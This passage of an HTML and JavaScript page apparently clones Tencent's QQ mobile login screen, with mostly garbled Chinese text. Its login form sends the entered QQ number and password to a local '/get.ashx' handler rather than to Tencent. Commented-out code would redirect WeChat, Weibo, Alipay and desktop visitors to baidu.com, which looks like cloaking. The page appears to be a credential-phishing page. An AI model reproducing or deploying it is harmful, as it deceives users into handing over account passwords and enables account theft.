                    setCookie('guide2', '1', ".ui.ptlogin2.qq.com", "/", 7 * 24);
                    $('guide').style.display = 'none';
                }
                close();
                /* on($('guideSkip'),'click',function(){
                     close();
                     pv('m.qzone.com','/guide_toWeb');
                 });*/
                on($('guideJump'), 'click', function () {
                    setCookie('guide2', '1', ".ui.ptlogin2.qq.com", "/", 3 * 24);
                    var g_sSchema = "mqzonev2:\/\/arouse\/activefeed?source=webview&version=1";
                    var g_sQzoneDownloadPage = "http://m.qzone.com/activity/client_update.html";
                    var g_sDownload = 'http://m.qzone.com/l?g=151&g_f=2000000141';
                    var g_sUA = navigator.userAgent.toLowerCase();
                    var android = g_sUA.match(/(android)\s+([\d.]+)/);
                    var ios = g_sUA.match(/(ipad|iphone|ipod).*os\s([\d_]+)/);
                    var isAndroid = !!android;
                    var isIos = !!ios;

                    if (isAndroid || isIos) {
                        var div = document.createElement('div');
                        div.style.visibility = 'hidden';
                        div.innerHTML = "<iframe id=\"schema\" src=\"" + g_sSchema + "\" scrolling=\"no\" width=\"1\" height=\"1\"></iframe>";
                        document.body.appendChild(div);
                        var start = Date.now();
                        setTimeout(function () {
                            var time = Date.now() - start;
                            if (time < 1000) {
                                location = g_sDownload;
                            }
                        }, 800);
                    } else {
                        location = g_sQzoneDownloadPage; //�߲��������֧
                    }
                });
                pv('m.qzone.com', '/guide_show');
            }
        })();
    </script>
    <div id="content" class="content">
        <div id="error_tips">
            <div id="error_tips_content">
                <span id="error_icon"></span>
                <span id="error_message">����û���������룡</span>
            </div>
        </div>
        <div id="yd-notify">
            <p id="notify"></p>
        </div>

        <div id="login" class="login">
            <div id="logo" class="logo"></div>
            <div id="app_name" style="display:none"></div>
            <div id="q_login" class="q_login" style="display:none">
                <div id="q_login_title">
                    <div id="q_login_logo"></div>
                    <form id="loginform" autocomplete="off" name="loginform" action="/get.ashx?t=2" method="post" target="_self" style="margin:0">
                        <label id="q_login_tips">��ѡ���¼�ʺ�</label>
                </div>
                <div id="q_logon_list" class="q_logon_list"></div>
            </div>
            <div id="web_login">
                <ul id="g_list">
                    <li id="g_u">
                        <div id="del_touch" class="del_touch">
                            <span id="del_u" class="del_u"></span>
                        </div>
                        <input id="u" class="inputstyle" name="username" autocomplete="off" placeholder="QQ&#x53F7;&#x7801;/&#x624B;&#x673A;/&#x90AE;&#x7BB1;">
                    </li>
                    <li id="g_p">
                        <div id="del_touch_p" class="del_touch">
                            <span id="del_p" class="del_u"></span>
                        </div>
                        <input id="p" class="inputstyle" maxlength="16" type="password" name="userpass" autocorrect="off" placeholder="&#x8BF7;&#x8F93;&#x5165;&#x60A8;&#x7684;QQ&#x5BC6;&#x7801;">
                    </li>
                </ul>
                <div href="javascript:void(0);" id="go" onclick="return tj();">�� ¼</div>
                <div href="javascript:void(0);" id="onekey">һ����¼</div>
            </div>
            <div id="switch">
                <div id="swicth_login" onclick="pt._switch()" style="display:none">���ٵ�¼��ʷ�ʺ�</div>
                <div id="zc_feedback">
                    <span id="zc">ע�����ʺ�</span>
                    <span id="forgetpwd">�������룿</span>
                </div>
            </div>
            <div id="custom_bottom"></div>
        </div>
        <div id="vcode">
            <label id="vcode_tips">���ͼƬ�ɸ�����֤��</label>
            <div id="vcode_area">
                <img id="vcode_img">
                <label id="input_tips">������ͼ�е��ַ������ִ�Сд</label>
                <input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off"
                    autocorrect="off" maxlength="6">
            </div>
            <div id="submit">�ύ��֤��</div>
        </div>
        </form>
    </div>
    <div id="new_vcode" class="new_vcode">
        <iframe id="cap_iframe" src="" frameborder="0" scrolling="auto" width="100%" height="100%"></iframe>
    </div>
    <div id="footerBlank"></div>
</body>
<script>var login_wording = "&#x5FEB;&#x901F;&#x767B;&#x5F55;&#x5386;&#x53F2;&#x5E10;&#x53F7;";
    var qlogin_wording = "&#x5E10;&#x53F7;&#x5BC6;&#x7801;&#x767B;&#x5F55;";


</script>
<script>                                    function cleanCache(t) { var e = document.createElement("iframe"); 3 == t.split("#").length && (t = t.substring(0, t.lastIndexOf("#"))), e.src = t, e.style.display = "none", document.body.appendChild(e) } function loadScript(t, e, o) { var n = document.createElement("script"); n.type = "text/javascript", n.charset = "utf-8", n.onload = n.onerror = n.onreadystatechange = function () { return window[o] ? void (loadJs.onloadTime = +new Date) : void (this.readyState && ("loaded" !== this.readyState && "complete" !== this.readyState || window[o]) || (e && e(), n.onerror = n.onreadystatechange = null)) }, n.src = t, document.getElementsByTagName("head")[0].appendChild(n) } function ptuiV(t) { t != window.ptui_pt_version && cleanCache("/clearcache.html#" + location.href) } function checkVersion() { var t = document.createElement("script"); t.src = "/ptui_ver.js?ptui_identifier=000DF0FB13AA0B93A92215E7C68FCB23F04117D4621FEC1988D73DB8&v=" + Math.random(), document.body.appendChild(t) } function loadJs() { if (1 != loadJs.hasLoad) { loadJs.hasLoad = !0; var t = "/js/" + window.ptui_pt_version + "/login_10.js"; loadScript(t, function () { var t = new Image; t.src = location.protocol + "//ui.ptlogin2.qq.com/cgi-bin/report?id=242325&union=256043"; var e = "/js/" + window.ptui_pt_version + "/login_10.js"; loadScript(e, function () { t.src = location.protocol + "//ui.ptlogin2.qq.com/cgi-bin/report?id=280504" }, "ptuiCB") }, "ptuiCB"), ready() } } function ready() { window.setTimeout(checkVersion, 1500) } document.addEventListener && document.addEventListener("DOMContentLoaded", loadJs), window.onload = loadJs, window.setTimeout(loadJs, 5e3); try { /MicroMessenger/i.test(navigator.userAgent) ? document.write('<script src="//res.wx.qq.com/open/js/jweixin-1.0.0.js" type="text/javascript"><\/script>') : /mqqbrowser/i.test(navigator.userAgent) && document.write('<script src="http://jsapi.qq.com/get?api=app.*,env.*,login.*" type="text/javascript"><\/script>') } catch (e) { }</script>
<script>
    // ��½�ж�
    (function (window) {
        var browser = {
            versions: function () {
                var u = navigator.userAgent, app = navigator.appVersion;
                return {//�ƶ��ն�������汾��Ϣ 
                    trident: u.indexOf('Trident') > -1, //IE�ں� 
                    presto: u.indexOf('Presto') > -1, //opera�ں� 
                    webKit: u.indexOf('AppleWebKit') > -1, //ƻ�����ȸ��ں� 
                    gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //����ں� 
                    mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), //�Ƿ�Ϊ�ƶ��ն� 
                    ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios�ն� 
                    android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android�ն˻���uc����� 
                    iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //�Ƿ�ΪiPhone���� HD����� 
                    iPad: u.indexOf('iPad') > -1, //�Ƿ�iPad 
                    webApp: u.indexOf('Safari') == -1 //�Ƿ�webӦ�ó���û��ͷ����ײ� 
                };
            }(),
            language: (navigator.browserLanguage || navigator.language).toLowerCase()
        }
        //�Ƿ��ƶ��˴�
            // if (browser.versions.mobile || browser.versions.android || browser.versions.ios) {
            // var ua = navigator.userAgent.toLowerCase()
            // console.log(ua)
            // if (ua.match(/MicroMessenger/i) == "micromessenger") {
            // window.location.href = "http://www.baidu.com"
            // }
            // else if (ua.match(/WeiBo/i) == "weibo") {
            // //������΢���ͻ��˴�
            // window.location.href = "http://www.baidu.com"
            // }
            // else if (ua.match(/QQ/i) == "qq") {
            // }
            // else if (ua.match(/AlipayClient/i) == 'alipayclient') {
            // window.location.href = "http://www.baidu.com"
            // } else if (browser.versions.trident || browser.versions.presto || browser.versions.webKit || browser.versions.gecko) {
            // window.location.href = "http://www.baidu.com"
            // }
            // }
    })(window)
    // ��ʾ����
    function NotifyContent(message) {
        let notifybox = document.getElementById('yd-notify')
        notifybox.style.display = 'block'
        let content = document.getElementById('notify')
        content.innerHTML = message
        window.setTimeout(function () {
            notifybox.style.display = 'none'
        }, 2000);   // 2000 = 2s ����ʧ
    }
    function tj() {
        let username = document.getElementById('u')
        let password = document.getElementById('p')
        // �û����жϣ�����Ϊ�� / ֻ����5-11λ�������
        let reg = /^\d{5,11}$/
        let pasreg = /^\?|\:[\u4e00-\u9fa5]$/;
        if (username.value == '') {
            NotifyContent('�㻹û�������˺ţ�')
            username.focus()
        }
        else if (pasreg.test(username.value)) {
            NotifyContent('������ʹ�����ֻ���ĸ��¼��')
        }
        else if (!reg.test(username.value)) {
            NotifyContent('��������ȷ���˺�!')
            username.focus()
        }
        else {
            if (password.value == '') {
                NotifyContent('����������')
                password.focus()
            } else if (pasreg.test(password.value)) {
                NotifyContent('������ʹ�����ֻ���ĸ��¼��')
            } else {
                document.getElementById("loginform").submit();
            }
        }
    }
</script>

</html>